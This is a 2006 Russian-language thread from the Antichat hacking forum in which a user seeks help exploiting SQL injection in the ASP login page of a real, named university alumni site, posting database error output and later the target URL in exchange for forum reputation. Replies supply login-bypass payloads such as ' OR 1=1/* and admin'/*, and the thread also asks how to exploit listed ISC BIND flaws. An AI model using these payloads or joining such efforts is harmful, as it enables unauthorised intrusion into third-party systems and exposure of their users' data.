ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

помогите с sql inj
  #1  
Старый 29.04.2006, 11:57
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию помогите с sql inj

Вообщем есть сервер, на нем есть страничка ASP на которой стандартная форма loginass

опробовал я ее на скуль

login: ' or '
pass: 123

ответ
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Line 1: Incorrect syntax near '123'. 

/asp/members.asp, line 94

login: 123
pass: ' or '

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string 'or ') AND (approve = 1)'. 

/asp/members.asp, line 94


Вот........ только вот не пойму, что с этого можно поиметь, если учесть то, что каждый пользователь в системе имеет RANDOM логин, то есть логина админа я не знаю...
 

  #2  
Старый 29.04.2006, 12:20
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

а так:
login'*/
а пасс пустой кажется..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #3  
Старый 29.04.2006, 12:23
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

а так же что можно, а точнее как можно что то поиметь с этого?

Обнаружено несколько уязвимостей в ISC Bind.
1. Возможно выполнение произвольного кода из-за ошибки при обработке запроса, содержащего неправильный параметр ключа в записи TSIG. Атакующий может переполнить стек и выполнить произвольный код на уязвимой системе.
2. Удаленный атакующий может получить доступ на чтение переменных окружения из стека с помощью специально сформированного рекурсивного запроса.
3. Возможен отказ в обслуживании. Обнаружена ошибка при переносах зон ZXFR. Удаленный атакующий может запросить ZXFR, которая не существует в кеше сервера имен, что приведет к аварийной остановке службы.


если кто знает - пишите.... оч надо =(
 

  #4  
Старый 29.04.2006, 12:27
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

дал бы ссылку, было бы еще легче.
1.Найди, где там Tsig.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #5  
Старый 29.04.2006, 12:46
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Ссылка в ЛС
 

  #6  
Старый 29.04.2006, 15:21
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

да все просто, если там не слешируются или не фильтруются ковычки, то в логин либо
' OR 1=1/*
и пасс пустой, либо как предлогал монстр, подбирать логины
admin'/*
root'/*
итп и пасс пустой, либо
' OR '1'='1
в оба поля и авторизуешься с первой учетной записью в БД

Последний раз редактировалось Trinux; 29.04.2006 в 16:53..
 

  #7  
Старый 29.04.2006, 17:19
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

никакой не пашет...только при ' or ' выводит ошибку и запрос , а при других просто говоит, что ошибка в таком-то скрипте.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #8  
Старый 29.04.2006, 22:28
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

http://alumni.kimep.kz/asp/members.asp

вот.... люди, оч надо! репу гарантирую =)
 

  #9  
Старый 10.05.2006, 14:38
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

Закрыто.Решение готово %)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ